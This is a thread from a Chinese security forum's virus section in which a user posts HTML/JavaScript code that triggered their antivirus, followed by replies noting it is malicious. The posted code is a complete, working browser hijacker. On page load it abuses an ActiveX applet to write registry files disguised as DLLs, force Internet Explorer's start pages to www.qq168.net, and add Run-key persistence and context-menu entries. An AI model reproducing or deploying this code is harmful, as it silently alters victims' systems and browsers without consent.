论坛: 病毒专区 标题: 我复制版主代码至记事本保存,瑞星即刻有病毒~Q~,请试试 复制本贴地址    
作者: yuku147 [yuku147]    论坛用户   登录
我个人通常会复制保留一些有用文本文的习惯,看到版主的三篇搞子实用,也就想保存下来,当我要按保存时,杀毒软件立即说有毒,吓死我啊~Q~下面是代码
PS:www.qq168.net一部分修改ie的恶意代码
<html><script language="">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>"); 
function runcmd()  
{  
a=document.applets[0];  
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');  
a.createInstance();  
Shl=a.GetObject();  
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');  
a.createInstance();  
fso=a.GetObject();  
var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true);  
wf1.writeLine('REGEDIT4'); 
wf1.WriteBlankLines(1);  
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');  
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');  
wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"');  
wf1.WriteBlankLines(1); 
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"'); 
wf1.Close();

var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true);  
wf1.writeLine('REGEDIT4'); 
wf1.WriteBlankLines(1);  
wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);  
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');  
wf1.WriteLine('"Start Page"="http://www.qq168.net"');  
wf1.WriteLine('"First Home Page"="http://www.qq168.net"');  
wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"');  
wf1.WriteLine('"Local Page"="http://www.qq168.net"');  
wf1.WriteBlankLines(1);
wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');
wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]');  
wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); 
wf1.WriteBlankLines(1);
wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]');  
wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"');      
wf1.WriteBlankLines(1); 
wf1.WriteLine('rcx');
wf1.Close();

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net");  
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); 
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net");
}  
setTimeout('runcmd()',1000);
</script>


地主 发表时间: 07/22 13:48

回复: all528 [all528]   论坛用户   登录
这个是恶意代码 杀毒软件是会报错的

B1层 发表时间: 07/29 12:02

回复: yuntian108 [yuntian108]   论坛用户   登录
请问你是不是以.htm文件保存?如果以.txt文件保存,应该不会有问题。

B2层 发表时间: 08/09 08:54

回复: lorys [lorys]   论坛用户   登录
我用KV3000试过。也要包错。厉害

B3层 发表时间: 10/26 13:10

回复: tuzi [tuzi]   版主   登录
先关闭 后保存 在开KV3000

B4层 发表时间: 10/26 15:09

回复: cailman [cailman]   论坛用户   登录
保存为TXT
金山也查到了

B5层 发表时间: 10/28 00:50

回复: xxing [xxing]   论坛用户   登录
我也看不懂,不过已前有人上过这个网站后注册表被改的一踏糊涂。
最后改不回来了,只有重作系统;但听说有一台没管他后来好了

B6层 发表时间: 10/28 20:13

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号